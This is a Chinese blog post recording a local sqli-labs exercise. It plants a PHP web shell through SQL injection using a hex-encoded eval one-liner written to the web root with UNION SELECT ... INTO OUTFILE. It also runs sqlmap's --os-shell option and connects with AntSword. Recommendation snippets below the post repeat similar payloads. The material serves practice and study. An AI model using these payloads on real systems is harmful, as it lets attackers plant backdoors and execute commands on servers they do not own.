sql注入写shell

最新推荐文章于 2024-07-11 22:08:09 发布
最新推荐文章于 2024-07-11 22:08:09 发布
阅读量366 收藏
点赞数
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jingxiaoxiong459/article/details/132035183
版权

into outfile get shell

1.先将mysql.ini配置文件添加secure_file_priv = '',让secure_file_priv 不表示任何值

2.假设我们已经得到了sql-lab靶场的网站根目录路径

3.准备一句话木马<?php eval(@$_REQUEST[x]);? >

4.将一句话木马十六进制编码

在网站转换成了十六进制:3c3f706870206576616c2840245f524551554553545b785d293b3f203e

5.写下?id=-1' union select 1,2,0x3c3f706870206576616c2840245f524551554553545b785d293b3f203e into outfile 'D:\\phpstu\\phpstudy_pro\\WWW\\shell.php' --+ 尝试将一句话木马shell.php放入网站根目录

尝试使用--so-shell来getshell

sqlmap

(1)sqlmap.py -u 127.0.0.1/sqli-labs-master/Less-1/?id=1 --os-shell

(2)选择语言为php

(3)手动填入路径

最终还是没有写入成功

最终分析,应该是更改secure_file_priv修改后没用重启mysql,mysql没有及时更新配置文件,重启之后登录Mysql-Front查看secure_file_priv的值,此次secure_file_priv成为空值

再次在sql-lab第一关输入payload:?id=-1' union select 1,2,0x3c3f706870206576616c28245f524551554553545b785d293b3f203e into outfile 'D:\\phpstu\\phpstudy_pro\\WWW\\shell.php' --+

一句话木马成功写入

github下载蚁剑,连接成功

再继续做--os-shell的实验

tmpbfnyt.php 用来执行系统命令

tmpuwwna.php 用来上传文件

jingxiaoxiong459
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
sqlshell原理_sql注入写入shell的条件
2301_77033340的博客
04-12 613
本篇文章属于自己验证,如有错误之处,请大佬指正。如需转载请注明本次验证涉及的工具有:1 Sqlmap 版本为1.7.22 Phpstudy 版本为8.1.1.3(Apache+Php(5.4)+Mysql(5.7))3 Burpsuite 2021专业版5 Navicat6 中国蚁剑7 靶场环境为Pikachu工具都是常见工具,如需要请网上自行下载1. 知晓网站的绝对路径原因是因为在指定--os-shell参数时,期间会让你输入要写入木马的web路径,不然蚁剑如何连接。
sql注入shell条件与方法(统计)
Vdieoo的博客
10-30 7821
条件: 1:要知道网站绝对路径,可以通过报错,phpinfo界面,404界面等一些方式知道 2:gpc没有开启,开启了单引号被转义了,语句就不能正常执行了 3:要有file权限,默认情况下只有root有 4:对目录要有权限,一般image之类的存放突破的目录就有 在mysql的配置文件 my.ini 中,secure_file_priv="c:/wamp64/tmp"被注释 或者`secure_file_priv配置的位置是web目录。 要了解secure_file_priv是否支...
sql注入写入shell
weixin_51646864的博客
04-23 6816
靶场练习一下sql注入写入shell方式
sql注入之getshell方式
最新发布
m0_52484587的博客
07-11 1155
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用--os-shell
SQL注入shell权限
CP1024的博客
01-21 3487
SQL注入shell权限 需要的条件 1. root权限 2. 知道网站的物理绝对路径 3. load_file() 开启 即 secure_file_priv 无限制 可以通过select @@secure_file_priv;查询 (1):如果为NULL,则不能写入 (2):如果为空,可以在任意文件位置下写入 (3):如果为一个路径,可以在该文件路径写入 4. 有写入权限 联合写入 ?id=1 UNION ALL SELECT 1,'<?php phpinfo();?>',3 into
SQL注入得到WEBSHELL
11-15 1026
一.通过SQL注入得到WEBSHELL的原理: N.E.V.E.R的方法:利用数据库备份得到WEBSHELL。创建一个表,在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据导出来,最后再删除新建的表。 分析: N.E.V.E.R利用了MSSQL的备份数据库功能。把数据导出来,设想数据库中有之类的ASP标实符,导出文件,文件名以.ASP的形式保存。然后文件又保存在WEB的
SQL注入shell条件
05-19
以下是一个可能的 SQL 注入 shell 的条件: 1. 目标网站存在 SQL 注入漏洞。 2. 目标网站的数据库管理用户具有写入文件的权限。 3. 目标网站使用的数据库是 MySQL。 4. 目标网站的 PHP 版本低于 5.3.4。 在这...
搬砖笔记-SQL注入shell的语句
WM_NNXX的博客
08-25 2516
SQL注入shell的几种语句 需要绝对路径和权限。 union select 后写入 lines terminated by 写入 lines starting by 写入 fields terminated by 写入 COLUMNS terminated by 写入 union select 后写入 最常见的写入方式,union select 后跟 into outfile 语句 http://1.1.1.1/x/x.php?id=1 union select 1,2,3,4,’<?php p
sql注入getshell的几种方式
热门推荐
内心不种满鲜花就会长满杂草
04-29 2万+
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用--os-shell
MySQL注入shell的条件
huang0612123的博客
05-13 387
HVV面试
SQL注入GetShell的方法(1)
forinput的博客
05-06 4067
SQL注入getshell的五中方式
sql注入怎么使用linux命令,SQL注入shell不成功后
weixin_36397104的博客
05-16 421
8种机械键盘轴体对比本人程序员,要买一个代码的键盘,请问红轴和茶轴怎么选?之前遇到sql注入,且是root权限后,很容易直接进去shell。现在的Mysql数据库的安全性也高了,即使注入得到mysql的root权限,有时候还是不进去shellSQL 注入 shellhttp://127.0.0.1:8000/waf/test.php?id=-1' union select 1,2,3 ...
SQL注入】从注入到获取服务器shell,记一次完整的SQL注入攻击过程
kkza的博客
10-28 2188
注入 以pikachu为例,首先发现一个数据查询的点,对其进行手工验证 易知存在SQL注入 shell 通过mysql写入文件需满足 连接数据库是root用户 my.ini配置文件需明确secure_file_priv="目录",参考:MySQL文件 ...
mysqlshell
weixin_47385895的博客
08-22 1972
mysql常见shell方法
WEBSHELL姿势之SQL一句话
forbidd3n,keep going
10-26 6065
之前的两篇WEBSHELL姿势谈到了两种拿SHELL的方法(上传+解析漏洞、http-put/move方法),当然有时最简单的时候就是上传无限制,或者通过改filename后缀实现。这次我们要实验的就是通过MYSQL来实现。 一般来说要利用MYSQL来实现一句话,有如下几种情况: 1.存在sql注入,在没有字符处理时可直接写入一句话(如Select '' into outfile 'F:/ww
渗透测试-sql注入getshell的几种方式
lza20001103的博客
08-19 986
渗透测试-sql注入getshell的几种方式 文章目录渗透测试-sql注入getshell的几种方式一. into outfile(1)看secure-file-priv参数的值 介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用–os-shell。 一. into outfile 利用条件 此方法利用的先决条件 web目录具有权限,能够使用单引号 知道网站绝对路径(根目录,或则是根目录往下的目录都行) secure_file_priv没有具体值(在mysql/m
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值